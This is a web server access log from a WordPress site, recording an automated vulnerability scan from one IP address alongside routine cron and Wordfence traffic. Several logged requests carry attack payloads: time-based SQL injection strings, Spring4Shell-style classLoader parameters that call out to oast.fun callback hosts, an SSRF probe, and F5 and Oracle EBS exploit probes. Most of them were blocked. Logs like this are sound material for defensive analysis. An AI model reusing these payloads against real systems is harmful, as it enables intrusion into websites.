165.232.54.158 - - [13/Jan/2026:22:40:48 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0"
103.4.122.14 - - [13/Jan/2026:22:41:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768315285.2959070205688476562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:41:23 +0800] "POST /?wordfence_syncAttackData=1768315283.6405 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:41:21 +0800] "GET /images/icons_title.gif HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:22:41:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768315292.4075429439544677734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:41:29 +0800] "DELETE /images/icons_title.gif HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
103.4.122.14 - - [13/Jan/2026:22:41:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768315299.3098471164703369140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:41:36 +0800] "GET /images/icons_title.gif HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:22:44:14 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
165.232.54.158 - - [13/Jan/2026:22:44:53 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:44:53 +0800] "GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1" 403 6626 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:47:00 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:47:37 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
165.232.54.158 - - [13/Jan/2026:22:48:41 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6626 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:22:50:37 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/105.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:50:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768315845.1682920455932617187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:50:43 +0800] "POST /?wordfence_syncAttackData=1768315843.5733 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:50:41 +0800] "GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
165.232.54.158 - - [13/Jan/2026:22:51:47 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:51:47 +0800] "GET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:51:47 +0800] "GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:22:51:48 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
165.232.54.158 - - [13/Jan/2026:22:52:35 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:52:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768315963.1105599403381347656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:52:41 +0800] "POST /?wordfence_syncAttackData=1768315961.5557 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:52:39 +0800] "GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:22:53:03 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:22:53:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768316024.0373239517211914062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:53:42 +0800] "POST /?wordfence_syncAttackData=1768316022.5261 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:53:40 +0800] "GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0"
165.232.54.158 - - [13/Jan/2026:22:54:01 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:22:54:02 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0"
103.4.122.14 - - [13/Jan/2026:22:55:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768316152.1555180549621582031250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:55:50 +0800] "POST /?wordfence_syncAttackData=1768316150.609 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:55:48 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0"
103.4.122.14 - - [13/Jan/2026:22:55:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768316156.2625451087951660156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:22:55:54 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:22:57:47 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:22:58:08 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:00:24 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:23:02:21 +0800] "GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:02:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768316552.1179430484771728515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:02:30 +0800] "POST /?wordfence_syncAttackData=1768316550.5672 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:02:28 +0800] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:02:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768316564.3284831047058105468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:02:41 +0800] "POST /ws/km-wsdl/setting/address_book HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:23:04:15 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6629 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0"
103.4.122.14 - - [13/Jan/2026:23:04:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768316662.1120579242706298828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:04:20 +0800] "POST /?wordfence_syncAttackData=1768316660.5384 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:04:18 +0800] "POST /?rest_route=/olistener/new HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:04:19 +0800] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:04:29 +0800] "POST /wp-cron.php?doing_wp_cron=1768316669.3334140777587890625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:04:26 +0800] "GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
103.4.122.14 - - [13/Jan/2026:23:04:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768316688.0437729358673095703125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:04:45 +0800] "POST /wp-json/am-member/license HTTP/1.1" 404 117 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:05:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768316700.3439071178436279296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:04:57 +0800] "GET /proxy?url=http%3a//0:8080/ HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [13/Jan/2026:23:06:30 +0800] "POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:23:06:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768316800.1348159313201904296875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:06:38 +0800] "POST /?wordfence_syncAttackData=1768316798.5954 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:06:36 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "https://nutritaste.com.au" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/118.0"
103.4.122.14 - - [13/Jan/2026:23:07:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768316863.5208039283752441406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:07:40 +0800] "GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1" 200 - "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:23:07:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768316879.4772539138793945312500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:07:56 +0800] "GET /service/0/test.oast.me HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:08:05 +0800] "POST /mgmt/tm/util/bash HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:09:00 +0800] "GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL-- HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:09:03 +0800] "POST /wp-cron.php?doing_wp_cron=1768316943.2170350551605224609375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:09:01 +0800] "POST /?wordfence_syncAttackData=1768316941.6316 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:08:59 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:23:09:23 +0800] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
165.232.54.158 - - [13/Jan/2026:23:09:24 +0800] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:09:27 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
165.232.54.158 - - [13/Jan/2026:23:09:27 +0800] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
165.232.54.158 - - [13/Jan/2026:23:09:28 +0800] "GET /wp-content/uploads/html2wp/38Btk4tyMRAHuCxtOpLOT13BseW.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
165.232.54.158 - - [13/Jan/2026:23:09:31 +0800] "POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [13/Jan/2026:23:09:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768316986.2148909568786621093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:09:44 +0800] "POST /?wordfence_syncAttackData=1768316984.5841 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:09:42 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:09:53 +0800] "POST /wp-cron.php?doing_wp_cron=1768316993.1592459678649902343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:09:50 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:10:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768317000.3940041065216064453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:09:57 +0800] "GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:23:13:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768317237.6059238910675048828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:13:54 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 225 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:23:18:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768317511.8137390613555908203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:18:28 +0800] "GET /backend/backend/auth/signin HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:19:17 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:23:19:23 +0800] "POST /?wordfence_syncAttackData=1768317563.4583 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:19:21 +0800] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 400 21 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:19:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768317565.0048739910125732421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:21:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768317670.8890719413757324218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:21:07 +0800] "POST /functionRouter HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:21:08 +0800] "POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586"
165.232.54.158 - - [13/Jan/2026:23:22:08 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:22:11 +0800] "POST /wp-cron.php?doing_wp_cron=1768317731.2434449195861816406250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:22:08 +0800] "POST / HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:22:08 +0800] "GET /?class.module.classLoader.resources.context.configFile=http://d5iu610i9qj8svou82p01ou9x7doy6b9n.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:22:08 +0800] "GET /?class.module.classLoader.resources.context.configFile=https://d5iu610i9qj8svou82p09arn89sxqna15.oast.fun&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1" 301 - "-" "Mozilla/5.0 (SS; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [13/Jan/2026:23:24:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768317845.8043119907379150390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:24:02 +0800] "POST /cms/content/list HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:24:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768317849.4419960975646972656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:24:06 +0800] "GET /?location=search HTTP/1.1" 200 16322 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
165.232.54.158 - - [13/Jan/2026:23:24:23 +0800] "GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1" 404 52577 "-" "-"
103.4.122.14 - - [13/Jan/2026:23:24:26 +0800] "POST /wp-cron.php?doing_wp_cron=1768317866.6966838836669921875000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:24:23 +0800] "GET /sap/admin/public/default.html HTTP/1.1" 404 52577 "-" "-"
165.232.54.158 - - [13/Jan/2026:23:24:26 +0800] "GET / HTTP/1.1" 200 86984 "-" "-"
165.232.54.158 - - [13/Jan/2026:23:24:26 +0800] "GET / HTTP/1.1" 200 86984 "-" "-"
103.4.122.14 - - [13/Jan/2026:23:24:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768317875.7989881038665771484375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:24:34 +0800] "POST /?wordfence_syncAttackData=1768317874.4094 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:24:32 +0800] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/117.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:24:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768317883.3439979553222656250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:24:40 +0800] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:24:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768317890.8089990615844726562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:24:49 +0800] "POST /?wordfence_syncAttackData=1768317889.3721 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:24:47 +0800] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:23:25:02 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:26:21 +0800] "POST /wp-cron.php?doing_wp_cron=1768317981.6951971054077148437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:26:18 +0800] "POST /ca/rest/certrequests HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
165.232.54.158 - - [13/Jan/2026:23:27:30 +0800] "POST /admin/login.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:23:27:32 +0800] "GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1" 404 117 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:23:27:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768318056.2886641025543212890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:23:27:34 +0800] "POST /?wordfence_syncAttackData=1768318054.5926 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:23:27:36 +0800] "GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
